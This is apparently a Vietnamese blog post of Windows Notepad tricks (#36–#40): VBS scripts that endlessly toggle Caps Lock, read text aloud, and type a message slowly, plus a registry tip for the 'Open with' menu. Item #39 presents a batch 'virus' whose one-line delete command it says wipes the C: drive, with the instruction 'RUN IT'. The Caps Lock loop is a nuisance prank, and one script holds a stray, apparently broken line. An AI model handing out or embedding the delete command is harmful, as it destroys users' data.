#36 Làm thế nào để mở đồng thời 1 nút trên bàn phím của bạn khi mở file

Chẳng hạn như nút Caps Lock

Mở Notepad

Paste đoạn code sau vào Notepad:

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
pingpong
Save lại với bất kì tên gì với đuôi .vbs sau đó đóng lại.
Bây giờ bạn mở lại file vừa lưu và nhìn thấy điều gì xảy ra với bàn phím của bạn

#37 Làm thế nào để chuyển đổi tập tin sang dạng âm thanh

Mở Notepad
Paste đoạn code sau :
Dim message, sapi message=InputBox(“Enter your text for conversion–Hacking-world.tk”,”Hover pc Hacks Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message
Save lại với tên bất kì với đuôi mở rộng  .vbs

#38 Thủ thuật làm Notepad hiện chữ chậm

Mở Notepad >  Paste đoạn code sau vào Notepad
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
Save lại với tên bất kì và phần mở rộng  .vbs và đóng lại.

#39 Làm thế nào để tạo 1 con Virus của bạn mà không bị xóa

Mở Notepad
Paste đoạn code sau vào Notepad ( tốt nhất là không nên đánh lại vào Notepad)
@Echo off
Del C:\ *.* |y
Save lại với tên bất kì với phần mở rộng  .bat
RUN IT
Nó sẽ xóa nội dung trong C:\ drive…
Tuyệt đối không mở file  .bat ..... nếu mở hệ thống sẽ xóa C:\ drive…

#40 Làm sao để loại bỏ bớt các chương trình từ Open with trong Explorer

Làm theo các bước sau:
Bước 1: Mở Start > Run > Regedit
Bước 2: Tìm đến "HKEY_CURRENT_USER \Software \Microsoft \Windows \CurrentVersion \ Explorer \FileExts\"
image190
Bước 3: Xóa các tùy chọn mà bạn không muốn nó xuất hiện trong Explorer.
Chọn Yes nếu như bạn chắc chắn muốn xóa.
sshot20100526165223
Thủ thuật này giúp bạn mở Menu gọn gàng hơn, và chỉ hiện thị các chương trình mà bạn muốn trong danh sách.
~~Writen by Minhhuy~~